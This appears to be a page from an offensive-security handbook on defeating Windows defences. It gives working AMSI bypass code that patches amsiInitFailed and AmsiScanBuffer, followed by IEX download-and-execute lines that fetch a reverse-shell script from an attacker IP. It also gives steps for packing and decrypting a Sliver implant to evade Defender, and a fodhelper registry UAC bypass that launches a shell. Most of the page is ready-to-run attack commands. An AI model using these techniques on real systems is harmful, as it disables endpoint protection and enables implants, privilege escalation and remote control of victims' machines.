Bypassing Security

AMSI

Powershell Only

$a = 'System.Management.Automation.A';$b = 'ms';$u = 'Utils'
$assembly = [Ref].Assembly.GetType(('{0}{1}i{2}' -f $a,$b,$u))
$field = $assembly.GetField(('a{0}iInitFailed' -f $b),'NonPublic,Static')
$me = $field.GetValue($field)
$me = $field.SetValue($null, [Boolean]"hhfff")

# Download and execute amsi.ps1 globally to globally bypass amsi
IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/amsi.ps1'))

Global 

$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $Win32

$LoadLibrary = [Win32]::LoadLibrary("am" + "si.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "Amsi" + "Scan" + "Buffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)

# Download and execute reverse shell or any other script
IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.14.5/x.ps1'))

Windows Defender

For csharp, pe or raw executable's use Nimcrypt2:

nimcrypt -f INPUT.exe -t pe -s -e -o OUTPUT_enc.exe

  • -t for filetype

  • -e to use encryption

PELoader + pe2shc

We first generate a Sliver implant and upload it to our Windows attacking host (not target). We will need https://github.com/hasherezade/pe_to_shellcode and https://github.com/Hagrid29/PELoader.

We first convert the PE to shellcode:

> .\pe2shc.exe sliver_PE.exe

Next, we use PE_loader.exe to encrypt the shellcode:

> set hagrid=enc sliver_PE.shc.exe
> .\PELoader.exe
argument: enc sliver_PE.shc.exe
Encrypting File

This will output "sliver_PE.shc.exe.enc". Upload this file to the target together with PELoader.exe. Of course rename PELoader.exe to incendiumrocks.exe. After that set the env and decrypt and execute the encrypted shellcode (our Sliver implant)

> set hagrid=mdll sliver_PE.shc.exe.enc
> .\incendiumrocks.exe

Done, check your listener in Sliver

UAC

User Account Control (UAC) is a key part of Windows security. UAC reduces the risk of malware by limiting the ability of malicious code to execute with administrator privileges.

Check UAC settings

REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System
    ConsentPromptBehaviorAdmin    REG_DWORD    0x5

if 5(default) it will ask the administrator to confirm to run non Windows binaries with high privileges:

Common bypass with AutoElevate

Some executables can auto-elevate, achieving high IL without any user intervention. This applies to most of the Control Panel's functionality and some executables provided with Windows.

For an application, some requirements need to be met to auto-elevate:

  • The executable must be signed by the Windows Publisher

  • The executable must be contained in a trusted directory, like %SystemRoot%/System32/ or %ProgramFiles%/

To check if a binary has autoElevate, we can use sigcheck:

C:\tools\> sigcheck64.exe -m c:/windows/system32/msconfig.exe
...
<asmv3:application>
	<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
		<dpiAware>true</dpiAware>
		<autoElevate>true</autoElevate>
	</asmv3:windowsSettings>
</asmv3:application>

Fodhelper

Fodhelper.exe is one of Windows default executables in charge of managing Windows optional features, including additional languages, applications not installed by default, or other operating system characteristics. Like most of the programs used for system configuration, fodhelper can auto elevate when using default UAC settings so that administrators won't be prompted for elevation when performing standard administrative tasks. Fodhelper can be abused without having access to a GUI.

When Windows opens a file, it checks the registry to know what application to use.

We can set the following keys for the fodhelper binary:

C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="cmd.exe /c /windows/tasks/shell.exe"

C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.

C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.

And then proceed to execute fodhelper.exe, which in turn will trigger the execution of our reverse shell.

C:\> fodhelper.exe

More bypasses with UACME

  • Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.

PreviousRelay attacksNextFile Transfer

Last updated